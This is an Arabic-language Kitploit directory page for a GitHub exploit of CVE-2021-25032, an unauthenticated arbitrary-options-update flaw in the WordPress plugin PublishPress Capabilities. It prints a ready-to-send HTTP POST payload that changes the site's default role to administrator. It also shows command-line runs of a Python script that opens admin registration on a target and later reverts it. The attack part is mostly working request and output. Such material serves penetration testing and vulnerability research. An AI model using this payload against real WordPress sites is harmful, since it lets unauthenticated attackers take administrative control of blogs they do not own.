Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-25032 — PublishPress Capabilities < 2.3.1 - تحديث خيارات تعسفي غير مصادق عليه يؤدي إلى اختراق المدونة | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2021-25032
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةسوء التكوين
GitHubrandomrobbiebf/cve-2021-25032

CVE-2021-25032

PublishPress Capabilities < 2.3.1 - تحديث خيارات تعسفي غير مصادق عليه يؤدي إلى اختراق المدونة

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-25032

PublishPress Capabilities 2.2 - 2.3 - تحديث غير مصادق عليه لخيارات عشوائية يؤدي إلى اختراق المدونة

الوصف

لا يمتلك المكوّن الإضافي فحوصات التفويض وCSRF عند تحديث إعداداته عبر خطاف init، ولا يضمن أن الخيارات المقرر تحديثها تخص المكوّن الإضافي. ونتيجةً لذلك، يمكن للمهاجمين غير المصادق عليهم تحديث خيارات عشوائية في المدونة، مثل الدور الافتراضي، وجعل أي مستخدم مسجّل جديد يتمتع بدور المسؤول.

إثبات المفهوم

root@kitploit:~
POST /wp-admin/admin.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 81
Connection: close

page=pp-capabilities-settings&all_options=default_role&default_role=administrator

مثال على استخدام السكربت

تفعيل التسجيل ودور المسؤول

root@kitploit:~
$ python3 CVE-2021-25032.py -u http://wordpress.lan
The plugin version is below 2.3.1.
The plugin version is 2.2
Vulnerability check: http://wordpress.lan
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.

تعطيل التسجيل ودور المشترك

root@kitploit:~
$ python3 CVE-2021-25032.py -u http://wordpress.lan --fix yes
Vulnerability check: http://wordpress.lan
Options set successfully: http://wordpress.lan/wp-admin/admin.php
Fixed: You can not longer register
تنزيل الأداة